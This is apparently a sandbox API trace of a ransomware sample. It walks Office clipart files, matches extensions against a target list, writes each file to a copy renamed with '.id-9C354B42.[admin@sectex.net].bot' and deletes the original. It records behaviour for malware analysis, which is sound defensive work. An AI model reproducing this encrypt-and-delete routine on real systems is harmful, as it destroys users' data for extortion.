	[0053.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63
	[0053.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63
	[0053.382] lstrlenW (lpString=".doc") returned 4
	[0053.382] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0053.382] lstrlenW (lpString=".docx") returned 5
	[0053.382] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0053.382] lstrlenW (lpString=".pdf") returned 4
	[0053.382] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0053.382] lstrlenW (lpString=".xls") returned 4
	[0053.382] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0053.382] lstrlenW (lpString=".xlsx") returned 5
	[0053.382] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0053.382] lstrlenW (lpString=".ppt") returned 4
	[0053.382] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0053.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63
	[0053.382] lstrlenW (lpString=".zip") returned 4
	[0053.382] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0053.383] lstrlenW (lpString=".rar") returned 4
	[0053.383] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0053.383] lstrlenW (lpString=".bz2") returned 4
	[0053.383] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0053.383] lstrlenW (lpString=".7z") returned 3
	[0053.383] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0053.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63
	[0053.383] lstrlenW (lpString=".dbf") returned 4
	[0053.383] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0053.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63
	[0053.383] lstrlenW (lpString=".1cd") returned 4
	[0053.383] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0053.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63
	[0053.383] lstrlenW (lpString=".jpg") returned 4
	[0053.383] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0053.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63
	[0053.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63
	[0053.383] lstrlenW (lpString=".doc") returned 4
	[0053.383] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0053.383] lstrlenW (lpString=".docx") returned 5
	[0053.383] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0053.383] lstrlenW (lpString=".pdf") returned 4
	[0053.383] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0053.383] lstrlenW (lpString=".xls") returned 4
	[0053.383] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0053.383] lstrlenW (lpString=".xlsx") returned 5
	[0053.383] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0053.383] lstrlenW (lpString=".ppt") returned 4
	[0053.383] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0053.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63
	[0053.383] lstrlenW (lpString=".zip") returned 4
	[0053.383] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0053.383] lstrlenW (lpString=".rar") returned 4
	[0053.383] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0053.384] lstrlenW (lpString=".bz2") returned 4
	[0053.384] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0053.384] lstrlenW (lpString=".7z") returned 3
	[0053.384] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0053.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63
	[0053.384] lstrlenW (lpString=".dbf") returned 4
	[0053.384] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0053.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63
	[0053.384] lstrlenW (lpString=".1cd") returned 4
	[0053.384] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0053.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63
	[0053.384] lstrlenW (lpString=".jpg") returned 4
	[0053.384] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0053.384] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0053.384] lstrlenW (lpString="AG00092_.GIF") returned 12
	[0053.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0053.384] GetFileSizeEx (in: hFile=0x194, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=502) returned 1
	[0053.384] CloseHandle (hObject=0x194) returned 1
	[0053.384] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif")) returned 0x20
	[0053.385] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0053.385] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.385] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0053.385] GetLastError () returned 0x0
	[0053.385] ReadFile (in: hFile=0x194, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x1f6, lpOverlapped=0x0) returned 1
	[0053.386] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x200, lpOverlapped=0x0) returned 1
	[0053.387] ReadFile (in: hFile=0x194, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.387] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0053.387] SetEndOfFile (hFile=0x1b0) returned 1
	[0053.387] CloseHandle (hObject=0x1b0) returned 1
	[0053.387] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.387] SetEndOfFile (hFile=0x194) returned 1
	[0053.388] CloseHandle (hObject=0x194) returned 1
	[0053.388] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.388] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif")) returned 1
	[0053.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63
	[0053.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63
	[0053.388] lstrlenW (lpString=".doc") returned 4
	[0053.388] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0053.388] lstrlenW (lpString=".docx") returned 5
	[0053.388] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0053.389] lstrlenW (lpString=".pdf") returned 4
	[0053.389] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0053.389] lstrlenW (lpString=".xls") returned 4
	[0053.389] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0053.389] lstrlenW (lpString=".xlsx") returned 5
	[0053.389] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0053.389] lstrlenW (lpString=".ppt") returned 4
	[0053.389] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0053.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63
	[0053.389] lstrlenW (lpString=".zip") returned 4
	[0053.389] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0053.389] lstrlenW (lpString=".rar") returned 4
	[0053.389] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0053.389] lstrlenW (lpString=".bz2") returned 4
	[0053.389] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0053.389] lstrlenW (lpString=".7z") returned 3
	[0053.389] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0053.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63
	[0053.389] lstrlenW (lpString=".dbf") returned 4
	[0053.389] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0053.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63
	[0053.389] lstrlenW (lpString=".1cd") returned 4
	[0053.389] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0053.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63
	[0053.389] lstrlenW (lpString=".jpg") returned 4
	[0053.389] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0053.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63
	[0053.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63
	[0053.389] lstrlenW (lpString=".doc") returned 4
	[0053.389] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0053.389] lstrlenW (lpString=".docx") returned 5
	[0053.389] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0053.389] lstrlenW (lpString=".pdf") returned 4
	[0053.389] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0053.390] lstrlenW (lpString=".xls") returned 4
	[0053.390] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0053.390] lstrlenW (lpString=".xlsx") returned 5
	[0053.390] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0053.390] lstrlenW (lpString=".ppt") returned 4
	[0053.390] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0053.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63
	[0053.390] lstrlenW (lpString=".zip") returned 4
	[0053.390] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0053.390] lstrlenW (lpString=".rar") returned 4
	[0053.390] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0053.390] lstrlenW (lpString=".bz2") returned 4
	[0053.390] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0053.390] lstrlenW (lpString=".7z") returned 3
	[0053.390] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0053.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63
	[0053.390] lstrlenW (lpString=".dbf") returned 4
	[0053.390] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0053.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63
	[0053.390] lstrlenW (lpString=".1cd") returned 4
	[0053.390] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0053.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63
	[0053.390] lstrlenW (lpString=".jpg") returned 4
	[0053.390] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0053.390] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0053.391] lstrlenW (lpString="AG00103_.GIF") returned 12
	[0053.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0053.391] GetFileSizeEx (in: hFile=0x194, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=12702) returned 1
	[0053.391] CloseHandle (hObject=0x194) returned 1
	[0053.391] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif")) returned 0x20
	[0053.392] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0053.392] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.392] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0053.392] GetLastError () returned 0x0
	[0053.392] ReadFile (in: hFile=0x194, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x319e, lpOverlapped=0x0) returned 1
	[0053.394] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x31a0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x31a0, lpOverlapped=0x0) returned 1
	[0053.395] ReadFile (in: hFile=0x194, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.395] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0053.395] SetEndOfFile (hFile=0x1b0) returned 1
	[0053.395] CloseHandle (hObject=0x1b0) returned 1
	[0053.395] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.395] SetEndOfFile (hFile=0x194) returned 1
	[0053.396] CloseHandle (hObject=0x194) returned 1
	[0053.396] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.396] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif")) returned 1
	[0053.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63
	[0053.396] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63
	[0053.396] lstrlenW (lpString=".doc") returned 4
	[0053.396] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0053.396] lstrlenW (lpString=".docx") returned 5
	[0053.397] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0053.397] lstrlenW (lpString=".pdf") returned 4
	[0053.397] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0053.397] lstrlenW (lpString=".xls") returned 4
	[0053.397] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0053.397] lstrlenW (lpString=".xlsx") returned 5
	[0053.397] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0053.397] lstrlenW (lpString=".ppt") returned 4
	[0053.397] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0053.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63
	[0053.397] lstrlenW (lpString=".zip") returned 4
	[0053.397] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0053.397] lstrlenW (lpString=".rar") returned 4
	[0053.397] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0053.397] lstrlenW (lpString=".bz2") returned 4
	[0053.397] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0053.397] lstrlenW (lpString=".7z") returned 3
	[0053.397] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0053.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63
	[0053.397] lstrlenW (lpString=".dbf") returned 4
	[0053.397] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0053.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63
	[0053.397] lstrlenW (lpString=".1cd") returned 4
	[0053.397] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0053.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63
	[0053.397] lstrlenW (lpString=".jpg") returned 4
	[0053.397] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0053.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63
	[0053.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63
	[0053.397] lstrlenW (lpString=".doc") returned 4
	[0053.397] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0053.397] lstrlenW (lpString=".docx") returned 5
	[0053.397] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0053.397] lstrlenW (lpString=".pdf") returned 4
	[0053.398] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0053.398] lstrlenW (lpString=".xls") returned 4
	[0053.398] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0053.398] lstrlenW (lpString=".xlsx") returned 5
	[0053.398] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0053.398] lstrlenW (lpString=".ppt") returned 4
	[0053.398] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0053.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63
	[0053.398] lstrlenW (lpString=".zip") returned 4
	[0053.398] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0053.398] lstrlenW (lpString=".rar") returned 4
	[0053.398] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0053.398] lstrlenW (lpString=".bz2") returned 4
	[0053.398] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0053.398] lstrlenW (lpString=".7z") returned 3
	[0053.398] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0053.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63
	[0053.398] lstrlenW (lpString=".dbf") returned 4
	[0053.398] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0053.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63
	[0053.398] lstrlenW (lpString=".1cd") returned 4
	[0053.398] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0053.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63
	[0053.398] lstrlenW (lpString=".jpg") returned 4
	[0053.398] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0053.398] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0053.398] lstrlenW (lpString="AG00120_.GIF") returned 12
	[0053.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0053.399] GetFileSizeEx (in: hFile=0x194, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=3484) returned 1
	[0053.399] CloseHandle (hObject=0x194) returned 1
	[0053.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif")) returned 0x20
	[0053.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0053.399] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.399] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0053.399] GetLastError () returned 0x0
	[0053.399] ReadFile (in: hFile=0x194, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0xd9c, lpOverlapped=0x0) returned 1
	[0053.401] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xda0, lpOverlapped=0x0) returned 1
	[0053.402] ReadFile (in: hFile=0x194, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.402] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0053.402] SetEndOfFile (hFile=0x1b0) returned 1
	[0053.402] CloseHandle (hObject=0x1b0) returned 1
	[0053.402] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.402] SetEndOfFile (hFile=0x194) returned 1
	[0053.403] CloseHandle (hObject=0x194) returned 1
	[0053.583] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.800] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif")) returned 1
	[0055.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63
	[0055.332] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63
	[0055.332] lstrlenW (lpString=".doc") returned 4
	[0055.332] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.332] lstrlenW (lpString=".docx") returned 5
